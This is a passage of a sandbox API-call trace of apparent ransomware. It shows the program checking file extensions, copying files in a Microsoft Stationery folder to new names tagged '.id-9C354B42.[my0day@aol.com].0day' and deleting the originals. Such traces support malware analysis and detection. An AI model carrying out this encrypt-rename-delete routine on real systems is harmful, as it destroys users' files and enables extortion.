(lpString=".doc") returned 4 [0041.623] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0041.623] lstrlenW (lpString=".docx") returned 5 [0041.623] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0041.623] lstrlenW (lpString=".pdf") returned 4 [0041.623] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0041.623] lstrlenW (lpString=".xls") returned 4 [0041.623] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0041.623] lstrlenW (lpString=".xlsx") returned 5 [0041.623] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0041.623] lstrlenW (lpString=".ppt") returned 4 [0041.623] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0041.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.624] lstrlenW (lpString=".zip") returned 4 [0041.624] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0041.624] lstrlenW (lpString=".rar") returned 4 [0041.624] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0041.624] lstrlenW (lpString=".bz2") returned 4 [0041.624] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0041.624] lstrlenW (lpString=".7z") returned 3 [0041.624] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0041.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.624] lstrlenW (lpString=".dbf") returned 4 [0041.624] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0041.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.624] lstrlenW (lpString=".1cd") returned 4 [0041.624] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0041.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.624] lstrlenW (lpString=".jpg") returned 4 [0041.624] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0041.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.624] lstrlenW (lpString=".doc") returned 4 [0041.624] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0041.624] lstrlenW (lpString=".docx") returned 5 [0041.624] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0041.624] lstrlenW (lpString=".pdf") returned 4 [0041.624] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0041.624] lstrlenW (lpString=".xls") returned 4 [0041.624] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0041.624] lstrlenW (lpString=".xlsx") returned 5 [0041.624] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0041.624] lstrlenW (lpString=".ppt") returned 4 [0041.624] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0041.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.625] lstrlenW (lpString=".zip") returned 4 [0041.625] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0041.625] lstrlenW (lpString=".rar") returned 4 [0041.625] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0041.625] lstrlenW (lpString=".bz2") returned 4 [0041.625] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0041.625] lstrlenW (lpString=".7z") returned 3 [0041.625] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0041.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.625] lstrlenW (lpString=".dbf") returned 4 [0041.625] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0041.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.625] lstrlenW (lpString=".1cd") returned 4 [0041.625] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0041.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.625] lstrlenW (lpString=".jpg") returned 4 [0041.625] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0041.625] lstrcmpiW (lpString1=".ini", lpString2=".0day") returned 1 [0041.625] lstrlenW (lpString="Desktop.ini") returned 11 [0041.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.625] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=645) returned 1 [0041.626] CloseHandle (hObject=0x200) returned 1 [0041.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 0x26 [0041.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.626] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.626] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.626] GetLastError () returned 0x0 [0041.626] ReadFile (in: hFile=0x200, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x285, lpOverlapped=0x0) returned 1 [0041.627] WriteFile (in: hFile=0x208, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x290, lpOverlapped=0x0) returned 1 [0041.628] ReadFile (in: hFile=0x200, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.628] WriteFile (in: hFile=0x208, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0041.628] SetEndOfFile (hFile=0x208) returned 1 [0041.628] CloseHandle (hObject=0x208) returned 1 [0041.629] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.629] SetEndOfFile (hFile=0x200) returned 1 [0041.630] CloseHandle (hObject=0x200) returned 1 [0041.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x26) returned 1 [0041.630] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0041.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.630] lstrlenW (lpString=".doc") returned 4 [0041.630] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0041.630] lstrlenW (lpString=".docx") returned 5 [0041.630] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0041.630] lstrlenW (lpString=".pdf") returned 4 [0041.630] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0041.630] lstrlenW (lpString=".xls") returned 4 [0041.630] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0041.630] lstrlenW (lpString=".xlsx") returned 5 [0041.630] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0041.630] lstrlenW (lpString=".ppt") returned 4 [0041.630] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0041.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.631] lstrlenW (lpString=".zip") returned 4 [0041.631] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0041.631] lstrlenW (lpString=".rar") returned 4 [0041.631] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0041.631] lstrlenW (lpString=".bz2") returned 4 [0041.631] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0041.631] lstrlenW (lpString=".7z") returned 3 [0041.631] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0041.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.631] lstrlenW (lpString=".dbf") returned 4 [0041.631] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0041.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.631] lstrlenW (lpString=".1cd") returned 4 [0041.631] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0041.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.631] lstrlenW (lpString=".jpg") returned 4 [0041.631] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0041.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.631] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.631] lstrlenW (lpString=".doc") returned 4 [0041.631] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0041.631] lstrlenW (lpString=".docx") returned 5 [0041.631] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0041.631] lstrlenW (lpString=".pdf") returned 4 [0041.631] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0041.631] lstrlenW (lpString=".xls") returned 4 [0041.631] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0041.631] lstrlenW (lpString=".xlsx") returned 5 [0041.631] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0041.631] lstrlenW (lpString=".ppt") returned 4 [0041.632] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0041.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.632] lstrlenW (lpString=".zip") returned 4 [0041.632] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0041.632] lstrlenW (lpString=".rar") returned 4 [0041.632] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0041.632] lstrlenW (lpString=".bz2") returned 4 [0041.632] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0041.632] lstrlenW (lpString=".7z") returned 3 [0041.632] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0041.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.632] lstrlenW (lpString=".dbf") returned 4 [0041.632] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0041.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.632] lstrlenW (lpString=".1cd") returned 4 [0041.632] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0041.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.632] lstrlenW (lpString=".jpg") returned 4 [0041.632] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0041.632] lstrcmpiW (lpString1=".emf", lpString2=".0day") returned 1 [0041.632] lstrlenW (lpString="Dotted_Lines.emf") returned 16 [0041.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.633] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=3792) returned 1 [0041.633] CloseHandle (hObject=0x200) returned 1 [0041.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf")) returned 0x20 [0041.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.636] lstrlenW (lpString=".doc") returned 4 [0041.636] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0041.636] lstrlenW (lpString=".docx") returned 5 [0041.636] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0041.636] lstrlenW (lpString=".pdf") returned 4 [0041.636] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0041.636] lstrlenW (lpString=".xls") returned 4 [0041.636] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0041.636] lstrlenW (lpString=".xlsx") returned 5 [0041.636] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0041.636] lstrlenW (lpString=".ppt") returned 4 [0041.636] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0041.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.637] lstrlenW (lpString=".zip") returned 4 [0041.637] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0041.637] lstrlenW (lpString=".rar") returned 4 [0041.637] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0041.637] lstrlenW (lpString=".bz2") returned 4 [0041.637] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0041.637] lstrlenW (lpString=".7z") returned 3 [0041.637] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0041.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.637] lstrlenW (lpString=".dbf") returned 4 [0041.637] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0041.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.637] lstrlenW (lpString=".1cd") returned 4 [0041.637] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0041.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.637] lstrlenW (lpString=".jpg") returned 4 [0041.637] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0041.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.637] lstrlenW (lpString=".doc") returned 4 [0041.637] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0041.637] lstrlenW (lpString=".docx") returned 5 [0041.637] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0041.637] lstrlenW (lpString=".pdf") returned 4 [0041.637] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0041.637] lstrlenW (lpString=".xls") returned 4 [0041.637] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0041.637] lstrlenW (lpString=".xlsx") returned 5 [0041.637] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0041.637] lstrlenW (lpString=".ppt") returned 4 [0041.637] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0041.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.637] lstrlenW (lpString=".zip") returned 4 [0041.638] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0041.638] lstrlenW (lpString=".rar") returned 4 [0041.638] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0041.638] lstrlenW (lpString=".bz2") returned 4 [0041.638] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0041.638] lstrlenW (lpString=".7z") returned 3 [0041.638] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0041.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.638] lstrlenW (lpString=".dbf") returned 4 [0041.638] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0041.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.638] lstrlenW (lpString=".1cd") returned 4 [0041.638] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0041.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.638] lstrlenW (lpString=".jpg") returned 4 [0041.638] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0041.638] lstrcmpiW (lpString1=".htm", lpString2=".0day") returned 1 [0041.638] lstrlenW (lpString="Garden.htm") returned 10 [0041.638] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.638] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=231) returned 1 [0041.638] CloseHandle (hObject=0x200) returned 1 [0041.639] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20 [0041.639] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.639] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.639] lstrlenW (lpString=".doc") returned 4 [0041.639] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0041.639] lstrlenW (lpString=".docx") returned 5 [0041.639] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0041.639] lstrlenW (lpString=".pdf") returned 4 [0041.639] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0041.639] lstrlenW (lpString=".xls") returned 4 [0041.639] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0041.639] lstrlenW (lpString=".xlsx") returned 5 [0041.639] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0041.639] lstrlenW (lpString=".ppt") returned 4 [0041.639] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0041.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.639] lstrlenW (lpString=".zip") returned 4 [0041.639] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0041.639] lstrlenW (lpString=".rar") returned 4 [0041.639] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0041.639] lstrlenW (lpString=".bz2") returned 4 [0041.639] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0041.639] lstrlenW (lpString=".7z") returned 3 [0041.639] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0041.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.640] lstrlenW (lpString=".dbf") returned 4 [0041.640] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0041.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.640] lstrlenW (lpString=".1cd") returned 4 [0041.640] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0041.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.640] lstrlenW (lpString=".jpg") returned 4 [0041.640] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0041.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.640] lstrlenW (lpString=".doc") returned 4 [0041.640] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0041.640] lstrlenW (lpString=".docx") returned 5 [0041.640] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0041.640] lstrlenW (lpString=".pdf") returned 4 [0041.640] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0041.640] lstrlenW (lpString=".xls") returned 4 [0041.640] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0041.640] lstrlenW (lpString=".xlsx") returned 5 [0041.640] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0041.640] lstrlenW (lpString=".ppt") returned 4 [0041.640] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0041.640] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.640] lstrlenW (lpString=".zip") returned 4 [0041.640] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0041.640] lstrlenW (lpString=".rar") returned 4 [0041.640] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0041.640] lstrlenW (lpString=".bz2") returned 4 [0041.640] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0041.640] lstrlenW (lpString=".7z") returned 3 [0041.640] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0041.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.641] lstrlenW (lpString=".dbf") returned 4 [0041.641] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0041.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.641] lstrlenW (lpString=".1cd") returned 4 [0041.641] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0041.641] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.641] lstrlenW (lpString=".jpg") returned 4 [0041.641] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0041.641] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0041.641] lstrlenW (lpString="Garden.jpg") returned 10 [0041.641] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0041.641] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=23871) returned 1 [0041.641] CloseHandle (hObject=0x200) returned 1 [0041.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0041.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.641] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.642] lstrlenW (lpString=".doc") returned 4 [0041.642] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.642] lstrlenW (lpString=".docx") returned 5 [0041.642] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0041.642] lstrlenW (lpString=".pdf") returned 4 [0041.642] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.642] lstrlenW (lpString=".xls") returned 4 [0041.642] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.642] lstrlenW (lpString=".xlsx") returned 5 [0041.642] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0041.642] lstrlenW (lpString=".ppt") returned 4 [0041.642] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0041.642] lstrlenW (lpString=".zip") returned 4 [0041.642] 